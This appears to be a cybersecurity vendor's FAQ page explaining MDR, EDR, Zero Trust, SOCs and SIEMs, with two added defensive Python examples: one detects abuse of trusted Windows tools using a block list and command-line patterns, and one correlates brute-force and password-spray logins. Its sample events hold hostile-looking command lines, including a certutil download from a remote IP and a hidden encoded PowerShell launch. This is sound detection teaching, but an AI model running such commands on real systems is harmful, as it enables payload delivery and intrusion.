What is MDR?
MDR is a cybersecurity service that combines advanced threat detection with human expertise to provide real-time monitoring, threat hunting, and incident response capabilities. The primary goal of MDR is to help organizations promptly detect and respond to cyberthreats.
When you hear ‘MDR,’ think:
- 24/7/365 monitoring of your business’ IT network(s) and user accounts by experienced security analysts.
- Immediate, active response before threat actors can spread further into your network.
- A significant reduction in time spent responding to alerts and handling false positives.
- A fully managed, agile security service built to rapidly detect and stop cyberthreats.
Why do I need MDR?
Cybersecurity is now a critical requirement for any business that depends on IT. Unfortunately, most businesses struggle to hire, train, and retain skilled cybersecurity staff. In addition, many off-the-shelf cybersecurity products require continuous human management and monitoring and often generate large numbers of false alarms. Finally, threat actors constantly evolve their tactics and tooling to find and exploit weaknesses in IT infrastructure and among its users.
According to Gartner Predicts 2023, by 2025 the lack of cybersecurity talent will lead to worse outcomes in over half of significant cyber incidents. To offset the skills gap and staffing shortage, businesses need 24/7 MDR to secure their company and complement any existing internal security efforts.
What is Endpoint Detection and Response (EDR)?
EDR is a cybersecurity technology that continuously records activity on endpoints, such as desktops, laptops, servers, and mobile devices (process execution, file changes, network connections, registry and memory activity), and uses that telemetry to automatically detect and respond to security incidents. It identifies malicious software, or malware, by comparing files and applications against known-bad antivirus (AV) signatures and/or by applying machine learning and behavioural rules to flag suspicious or malicious activity by an application or file.
While EDRs, along with AV products, provide basic malware detection, they often miss the early stages of an intrusion as well as the advanced techniques threat actors use to evade a company’s defences. For example, threat actors have learned to “live off the land”: they carry out attacks using the standard, trusted IT administration tools and services already present in modern IT environments (remote management agents, scripting hosts, built-in system utilities). In these scenarios an EDR often raises no alert, because the tool itself is legitimate and usually signed; only the context (the arguments passed, the parent process, the user, and the timing) distinguishes malicious from benign use, and that judgement typically requires a human analyst.
Fully automated solutions, like EDR, are no longer sufficient on their own to stop cyberthreats. Our own data shows that they consistently miss innovative and sophisticated techniques, especially when threat actors use trusted tools, approved workflows, or living-off-the-land techniques.
What is Zero Trust?
Zero Trust is a cybersecurity approach built on the principle of “never trust, always verify”: every request by a user or device for access to a resource or system is authenticated and authorized on its own merits, regardless of where on the network it originates. On the endpoint, the products most often sold as Zero Trust are application-control tools that default to deny and require ongoing tuning and management of allow or block lists. While permitting only known-good activity sounds promising, these products have shortcomings as a standalone cybersecurity solution:
- The constant micromanagement, monitoring, and validation of “good” users, devices, and applications is cumbersome.
- Legitimate users and applications may be denied access, leading to slow operations and decreased productivity.
- With technologies that default to blocking software, many businesses struggle to build and maintain an accurate list of applications to allow, and that list goes stale as routine software updates change file hashes and paths.
- As a result, many organizations that initially implement Zero Trust products disable or turn off important security capabilities because the impact on standard business operations is unacceptable. A more workable implementation of Zero Trust should include a curated block list (ideally one managed by an organization that monitors and tracks new things to block), allow for per-device and per-user exceptions, and be backed by a 24/7 Security Operations Center (SOC) team.
What is a SOC?
A SOC is a team of IT security professionals that monitors an organization’s entire IT infrastructure 24/7. SOCs use telemetry (data collected from across an organization’s IT infrastructure and cybersecurity platforms) to detect, investigate, and respond to cybersecurity incidents.
Should my small- or medium-sized business (SMB) hire an outsourced SOC?
According to Verizon’s Data Breach Investigations Report 2023, “SMBs and large corporations are using similar services and infrastructure and that means their attack surfaces share more in common than ever before.” Threat actors no longer go after a business based on size alone. Widespread attacks, including the abuse of trusted IT tools, expand the attack surface. Many SMBs believe they are too small or too unknown to warrant the attention of threat actors. However, data shows that SMBs are frequently targeted by threat actors because they often have insufficient security controls, making them easier targets and resulting in more success for the threat actors with less effort. Unfortunately, these attacks occur daily to SMBs, but they seldom make news headlines.
Similarly, Managed Service Providers (MSPs) often find it challenging to build and staff their own SOC. Increasingly, MSPs are turning to a dedicated MDR provider like Blackpoint Cyber for critical security tools and response services to keep their company and their clients secure.
What should I look for in a SOC?
- 24/7/365 monitoring by experienced security analysts
- Active threat response with industry-leading response times
- Incident recovery support
- Incident management
- Post-incident remediation guidance
- Dedicated threat intelligence staff or processes
- Capability to monitor and safeguard your specific IT services and platforms
How expensive is it to operate a SOC?
Most businesses, regardless of size, find it impractical to build and run a truly effective 24/7/365 SOC of their own. The cost (enough analysts to cover shifts around the clock, plus tooling, training, and retention), the technical complexity, and the staffing challenges mean that, for most businesses, operating their own SOC is not cost-effective compared with the advantages of an outsourced SOC.
What is SOC as a service (SOCaaS)?
SOCaaS is an evolution in how businesses buy, interact with, and manage an outsourced SOC program. Unlike traditional outsourced SOCs, which may require long-term contracts and full upfront payment and offer limited customization or management of the service, SOCaaS offerings typically follow a subscription-based model with cloud-based service management and may provide self-service customization, report access, and real-time visibility into SOC operations.
What’s Managed Application Control?
Threat actors often evade endpoint protection systems by “living off the land,” that is, by misusing legitimate IT tools already present in the target environment. Managed Application Control protects against these attacks with a block list of applications curated and continuously updated by Blackpoint’s threat intelligence team. Organizations can still create custom rules and allow exceptions. The approach contrasts with pure Zero Trust or deny-all methods of application control, which produce operational bottlenecks. With Managed Application Control, IT administrators can reduce time spent on allowlists and endless verification requests.
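What the difference between a trusted tool being present and a trusted tool being abused looks like in detection logic, and how a curated block list with per-user exceptions sits alongside it (the points made above about living off the land and about Zero Trust application control), as an added example written for this page rather than Blackpoint's product code. The block list, the exception rule, the command-line patterns, and the five process events are all constructed for the illustration; in practice the events would come from EDR or Sysmon process-creation telemetry.

```python
"""Added example: context-aware detection of trusted-tool abuse on Windows endpoints.

Illustrative code for this page, not Blackpoint's product logic. Every list,
rule and event below is constructed; real telemetry would come from an EDR.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    host: str
    user: str
    parent: str   # image name of the parent process
    image: str    # full path of the executed image
    cmdline: str


# Constructed managed block list (image name -> reason). A production list would
# also key on file hash or signer; names are enough to show the decision flow.
MANAGED_BLOCK_LIST = {
    "psexec.exe": "remote execution tool commonly used for lateral movement",
    "mimikatz.exe": "credential dumping tool",
}

# Constructed exceptions: (host, user, image); "*" matches anything. This is what
# keeps an approved administrator working while the tool stays blocked elsewhere.
EXCEPTIONS = {("*", "corp\\helpdesk-admin", "psexec.exe")}

# Tools that must remain available, so they are judged on *how* they are used.
CMDLINE_RULES = [
    ("certutil.exe", re.compile(r"-urlcache|-decode|-encode", re.I),
     "certutil used to download or transform a payload"),
    ("powershell.exe", re.compile(
        r"\s-(?:e|ec|enc|encodedcommand)\s+\S{20,}|downloadstring|downloadfile"
        r"|invoke-expression|\biex\b|-w(?:indowstyle)?\s+hidden", re.I),
     "PowerShell launched with encoded, hidden or download-cradle arguments"),
    ("rundll32.exe", re.compile(r"javascript:|\bhttps?://", re.I),
     "rundll32 executing script or remote content"),
    ("mshta.exe", re.compile(r"https?://|javascript:|vbscript:", re.I),
     "mshta executing inline script or a remote HTA"),
    ("wmic.exe", re.compile(r"process\s+call\s+create", re.I),
     "WMI used to spawn a process"),
]
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}


def basename(path: str) -> str:
    """Lower-case file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def excepted(host, user, image, exceptions) -> bool:
    return any(h in ("*", host) and u in ("*", user) and i == image
               for h, u, i in exceptions)


def evaluate(ev, block_list=MANAGED_BLOCK_LIST, exceptions=EXCEPTIONS, rules=CMDLINE_RULES):
    """Return (verdict, reasons); verdict is 'block', 'alert' or 'allow'."""
    image, parent = basename(ev.image), basename(ev.parent)
    host, user = ev.host.lower(), ev.user.lower()
    reasons, verdict = [], "allow"

    # Layer 1: curated block list with explicit exceptions.
    if image in block_list:
        if excepted(host, user, image, exceptions):
            reasons.append(f"exception applied for {image} ({user} on {host})")
        else:
            verdict = "block"
            reasons.append(f"blocked: {block_list[image]}")

    # Layer 2: behavioural rules. The binary alone is not evidence; arguments
    # and the parent process are what separate admin use from abuse.
    for rule_image, pattern, why in rules:
        if image == rule_image and pattern.search(ev.cmdline):
            reasons.append(why)
            verdict = verdict if verdict == "block" else "alert"
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {image}")
        verdict = verdict if verdict == "block" else "alert"
    return verdict, reasons


# Constructed sample telemetry (hosts, users and the base64 blob are made up).
SAMPLE_EVENTS = [
    ProcessEvent("ws-042", "corp\\jdoe", "winword.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA="),
    ProcessEvent("srv-01", "corp\\sysadmin", "cmd.exe", r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -hashfile C:\iso\win11.iso SHA256"),
    ProcessEvent("ws-042", "corp\\jdoe", "cmd.exe", r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://203.0.113.5/upd.exe C:\Users\Public\upd.exe"),
    ProcessEvent("ws-042", "corp\\jdoe", "explorer.exe", r"C:\Users\jdoe\Downloads\PsExec.exe",
                 r"PsExec.exe \\srv-01 -s cmd.exe"),
    ProcessEvent("ws-007", "corp\\helpdesk-admin", "cmd.exe", r"C:\Tools\PsExec.exe",
                 r"PsExec.exe \\srv-01 -s cmd.exe"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        verdict, reasons = evaluate(ev)
        print(f"{ev.host} {ev.user} {basename(ev.image)}: {verdict} {reasons}")
```

The second certutil event is the one a signature-only control cannot separate from the first: same signed binary, same host type, and only the `-urlcache -split -f` arguments mark it as a download. The PsExec pair shows the exception mechanism: the same command is blocked for a regular user and allowed for the helpdesk administrator, which is the difference between a managed block list and a deny-all policy that staff end up disabling.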
What best practices should be included in my cybersecurity stack?
Your security stack should cover the five main pillars of defense and resiliency:
- Asset visibility
- System hardening
- Threat detection
- Real-time response
- Incident recovery
More specifically, you should:
- Practice basic cyber hygiene, including:
  - Multifactor authentication (MFA),
  - Strong password policies, and
  - The principle of least privilege.
- Maintain an active cybersecurity awareness and training program so that you and your staff recognize current attacker techniques (phishing, social engineering, account impersonation) and know how to report them.
- Implement security services that provide fully managed and continuous response for on-premises and cloud environments.
  - This service should protect against current and emerging cyberattack tactics, including lateral movement, the abuse of legitimate IT tools, account impersonation, etc., and should be able to respond to these attacks in a timely manner, especially fast-moving ransomware attacks.
- Implement strict application management that is frequently updated with current threat intelligence.
- Establish a backup and recovery program, including offsite backups that cannot be compromised in a standard attack: keep copies offline or on immutable storage, protect the backup console with separate credentials and MFA, and test restores regularly.
- Conduct regular risk assessments and address high-risk findings.
- Adhere to government and industry best practices and compliance requirements.
- Execute a patch management program.
- Maintain ongoing visibility into internal, external, and cloud environments.
- Maintain an up-to-date Incident Response Plan (IRP).
- Maintain an accurate inventory of equipment, infrastructure, and user accounts, including IoT (Internet of Things) devices.
How do I protect my data in the cloud?
The workplace’s transition to cloud platforms has extended the attack surface available to threat actors and shifted where attacks happen: identities, mailboxes, and SaaS data rather than only the corporate network. Partner with a cloud security vendor that provides:
- Continuous monitoring, real-time detection, and active response,
- The ability to stop zero-day attacks (exploitation of vulnerabilities for which no patch yet exists) and attack tactics not seen before, and
- The ability to stop account compromise, business email compromise (BEC), data exfiltration, and more.
If I already use Microsoft Defender for Business or Microsoft 365 Business Premium to run and secure my business, do I need other services?
For the MSP community, cloud security can be one of the most challenging areas of cybersecurity, with many utilizing a Microsoft environment to run their business. To help MSPs better serve their clients, Blackpoint offers multiple solutions to provide further support for those services.
- Cloud Response: MDR-powered cloud monitoring and response for Microsoft 365, including Microsoft 365 Business Premium
- Managed EDR: Full-service response by our SOC team to EDR alerts for Microsoft Defender for Endpoint and Defender for Business
- Managed Defender for Endpoint: Fully managed version of Microsoft Defender for Endpoint, where you can easily control and apply policies to multiple customers at once
- Vulnerability Management’s Internal Scan: Understand the security of your clients’ Microsoft 365 presence, including their Microsoft Secure Score, through Microsoft Defender for Endpoint
- Vulnerability Management’s Cloud Scan: Easily view how your cloud security measures stack up to CIS Microsoft 365 Foundations Benchmarks
What is a SIEM?
A SIEM (security information and event management) platform collects event and log data generated by the organization’s technology infrastructure, audit systems, and cybersecurity technologies. While it can help with surfacing IT operational events and storing substantial amounts of data for investigations and exercises, it has some pitfalls:
- It can be extremely expensive, especially to implement well,
- Must receive significant amounts of data to offer much utility, which further increases costs,
- Usually takes weeks or months to fully implement,
- Often overwhelms security teams with unnecessary data and alerts,
- Requires expert users with knowledge of complex data query languages,
- Is slow at detecting active, in-progress cyberthreats, since most detections run as scheduled searches rather than in real time, and
- Requires additional third-party tools (such as a SOAR platform) for any response capability.
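What the "query language" and "response" gaps look like in practice: a SIEM holds the logs, but someone still has to write the correlation that turns them into an alert, and someone else has to act on it. The following is an added example for this page, not a query from Blackpoint or any SIEM vendor, showing two common account-compromise correlations (brute force, then success; password spray across many accounts, then success) run over constructed authentication log lines in a made-up `user=... src=... result=...` format. The thresholds and window are assumptions a team would tune to its own environment.

```python
"""Added example: two SIEM-style correlation rules over authentication logs.

Illustrative code written for this page, not a vendor query. The log format,
thresholds and every log line below are constructed for the example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format: ISO timestamp, user, source IP, result.
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})Z user=(?P<user>\S+) "
    r"src=(?P<src>\S+) result=(?P<result>success|failure)$")


def parse(lines):
    """Parse log lines into dicts, skipping malformed ones, sorted by time."""
    events = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # a real pipeline would count these as parse errors
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%S")
        events.append(e)
    return sorted(events, key=lambda e: e["ts"])


def correlate(lines, window=timedelta(minutes=10), brute_threshold=5, spray_min_users=5):
    """Flag a success that follows a burst of failures within `window`.

    Rule 1 (brute force): >= brute_threshold failures for one (user, src)
    pair, then a success for that pair.
    Rule 2 (password spray): failures for >= spray_min_users distinct users
    from one src, then a success for any user from that src.
    """
    by_pair = defaultdict(list)  # (user, src) -> failure timestamps
    by_src = defaultdict(list)   # src -> (timestamp, user) of failures
    alerts = []
    for e in parse(lines):
        pair = (e["user"], e["src"])
        if e["result"] == "failure":
            by_pair[pair].append(e["ts"])
            by_src[e["src"]].append((e["ts"], e["user"]))
            continue
        # Success: look back over the window for each rule.
        recent_pair = [t for t in by_pair[pair] if e["ts"] - t <= window]
        if len(recent_pair) >= brute_threshold:
            alerts.append({"type": "brute_force_then_success", "user": e["user"],
                           "src": e["src"], "failures": len(recent_pair), "ts": e["ts"]})
        recent_users = {u for t, u in by_src[e["src"]] if e["ts"] - t <= window}
        if len(recent_users) >= spray_min_users:
            alerts.append({"type": "password_spray_then_success", "user": e["user"],
                           "src": e["src"], "users": len(recent_users), "ts": e["ts"]})
        # A success resets the counters so one incident yields one alert.
        by_pair[pair].clear()
        by_src[e["src"]].clear()
    return alerts


# Constructed sample log: a brute-force run, a user's typo, one malformed line,
# and a password spray from a single source.
SAMPLE_LOG_LINES = (
    [f"2024-03-05T08:00:0{i}Z user=alice src=198.51.100.7 result=failure" for i in range(1, 7)]
    + ["2024-03-05T08:00:30Z user=alice src=198.51.100.7 result=success",
       "2024-03-05T08:30:00Z user=bob src=203.0.113.9 result=failure",
       "2024-03-05T08:30:08Z user=bob src=203.0.113.9 result=success",
       "2024-03-05T08:45:00Z user=alice src=10.0.0.5 result=success",
       "garbage line that should be skipped"]
    + [f"2024-03-05T09:0{i}:00Z user={u} src=192.0.2.44 result=failure"
       for i, u in enumerate(["carol", "dave", "erin", "frank", "grace", "heidi"])]
    + ["2024-03-05T09:06:00Z user=erin src=192.0.2.44 result=success"]
)

if __name__ == "__main__":
    for alert in correlate(SAMPLE_LOG_LINES):
        print(alert)
```

Bob's single failure followed by a success never fires, and the spray fires even though no individual account sees more than one failure; that second case is exactly what a per-account lockout policy misses and why the source IP has to be part of the join. Either alert still only tells someone that a mailbox may now be in an attacker's hands; revoking sessions and resetting the credential is the response step the SIEM itself does not perform.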
Do I need any security solutions other than my backup?
While up-to-date backups are a critical component of an effective cybersecurity program, they are not a silver bullet. Relying on backups as your primary cybersecurity strategy is a high-risk decision that does not protect your business as it will not:
- Stop an attack from happening in the first place,
- Prevent the theft of sensitive data; the failure to protect this data could result in compliance violations and lawsuits,
- Allow full recovery as threat actors may also target, corrupt, or destroy your backups as part of the attack,
- Prevent reputational damage to your customers and business, nor
- Prevent interruptions to business operations.
Should I consolidate my security stack with one vendor?
Cybersecurity service providers that offer an ecosystem of integrated solutions often provide more effective security at the same or lower cost than a strategy that relies on multiple point solutions from different vendors. When evaluating managed security services, consider one that has a robust ecosystem of products and services. Such service providers may offer the following benefits:
- Technology solutions that work well together, are efficient, and allow for expansion,
- Consistent service experience and expectations,
- Consolidated billing and bundled pricing from a single vendor,
- Faster onboarding and implementation of security capabilities,
- Unified reporting and alert/event management,
- Holistic security view of your assets,
- Faster threat detection due to integrated products, and
- Rapid creation of new threat detection capabilities.
Why choose Blackpoint Cyber?
At Blackpoint, we fuse real security and real response. Founded in 2014 by former National Security Agency (NSA) cyber operations experts, we have built an innovative and streamlined cyber ecosystem to protect your endpoints and your customers’ endpoints from advanced threat actors. Powered by our proprietary MDR technology, which combines network visualization, tradecraft detection, endpoint security, suspicious-event monitoring, and visibility into remote privileged activity, our SOC team neutralizes cyberthreats faster than any other solution on the market. These efforts are further supported by our Zero Trust mentality, alignment with industry-standard best practices, and our in-house threat intelligence team, which keeps us all one step ahead of our adversaries. Together, your MSP’s security stack can be proof that you employ superior security and best practices, keeping your community’s companies secure.
Learn how Blackpoint Cyber is protecting hundreds of businesses just like yours. Book a demo today!